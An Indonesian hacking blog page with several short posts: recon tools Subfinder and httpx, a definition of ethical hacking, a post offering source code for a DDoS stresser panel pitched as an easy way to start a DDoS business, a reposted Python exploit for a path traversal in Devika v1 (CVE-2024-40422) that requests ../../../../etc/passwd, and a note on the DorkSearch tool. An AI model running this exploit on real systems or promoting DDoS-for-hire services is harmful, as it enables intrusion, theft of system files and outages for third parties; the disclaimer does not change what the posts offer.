Saturday, 17 August 2024

Alat atau Tools Yang Digunakan Untuk Penestrasi Testing/Ethical Hacking

      Comment   
Halo semuanya.. kembali lagi pada blog saya yang membahas tentang ethical hacking, pada artikel kali ini saya akan membagikan tentang alat-alat yang digunakan dalam penetrasi testing/ethical hacking pada tahap awal.



Alat/tools yang digunakan terdiri dari :

1. Subfinder : adalah alat untuk pengintaian subdomian besar-besaran yang dapat di gunakan untuk menghasilkan daftar lengkap subdomain yang aktif dari sebuah website pada nama subdomain apapun.

2. Httpx : adalah untuk melakukan berbagai tugas yang terkait dengan pengujian keamana  website, seperti mengidentifikasi host aktif, menemukan port terbuka, serta menemukan aplikasi website.

Tools di atas adalah beberapa tools yang bisa kalian gunakan dalam tahap awal penetrasi testing atau ethical hacking, dari kedua cara di atas dapat kalian temukan beberapa celah keamanan website jika website yang kalian targetkan memiliki celah kerentanan dari beberala parameter sensitif dan beberapa port yang terbuka.

Nah sekian artikel saya kali ini, saya akan bahas lebih banyak lagi pada artikel lainnya.

Belajar Ethical Hacking

      Comment   
Halo semuanya.. saya akan membagikan sedikit pembelajaran untuk kalian semua yang ingin belanar mengenai ethical hacking. Apa itu ethical hacking ?



Ethical hacking adalah hacker yang bekerja demi menjaga keamanan website yang rentan terhadap serangan, sering kali kita dengan banyak website yang terkena malware, deface, kebocoran data dan banyak lagi. Itu semua akibat suatu kerentanan website yang di exploitasi oleh oknum-oknum tertertentu demi kepentingan pribadi atau hanya untuk merusak dari website tersebut.

Hacker banyak memanfaatkan kerentanan atau kelemahan website untuk melakukan itu semua, maka dari itu seorang ethical hacking adalah seseorang yang bertugas atau bekerja untuk mencari kerentanan website dan melaporkan serta menjaga website tersebut agar bisa di perbaiki celah kerentanannya supaya kerentanan tersebut tidak bisa di exploitasi oleh hacker-hacker jahat di kemudian hari.

Ethical hacker adalah orang yang sukarela membantu website-website yang rentan agar tidak bisa di susupi atau di exploitasi oleh orang jahat.

Nah pada artikel saya yang lainnya akan saya jelaskan bagaimana menjadi ethical hacking dan cara-caranya.

Monday, 12 August 2024

Knight Guardian

      Comment   
Knight Guardian :



Website ini memiliki layanan DDOS bernama Stresser Dot gg, dan saat ini layanan tersebut tidak tersedia karena sedang ditingkatkan.
Namun, kalian bisa mendapatkan source code lengkapnya. Omong-omong, banyak layanan DDOS yang memiliki panel mereka sendiri. Jika Anda ingin memulai bisnis tanpa repot dan dengan pengelolaan yang mudah untuk pengguna atau klien Anda, Anda bisa mencoba ini dan mempermudah memulai bisnis dengan layanan DDOS.
Satu hal lagi, Anda bisa menggunakan kode sumber ini untuk mempelajari cara kerja layanan tersebut.

Ingat kami dari pihak BlackLine menyarankan untuk hanya mempelajari dan menggunakannya ke website kalian sendiri
Kami tidak bertanggung jawab atas segala kerusakan yang ditimbulkan!!


Sunday, 11 August 2024

Exploit DataBase DEVIKA V1

      Comment   


# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python

import argparse
import requests

def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }

    response = requests.get(url, params=params)
    print(response.text)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    args = parser.parse_args()

    exploit(args.target)

Friday, 9 August 2024

DorkSearch - Alat Pencari Hebat!

      Comment   

DorkSearch




DorkSearch adalah alat yang mempercepat proses Google Dorking dengan menyediakan lebih dari 7.000 dork yang sudah dibuat sebelumnya. Alat ini juga memungkinkan pengguna untuk membuat dork baru, mencampur, dan mencocokkan dork, serta menemukan dork baru. Selain itu, DorkSearch memiliki fitur AI yang membantu membuat kueri dork.


Untuk informasi lebih lengkap, kunjungi [DorkSearch](https://www.dorksearch.com/).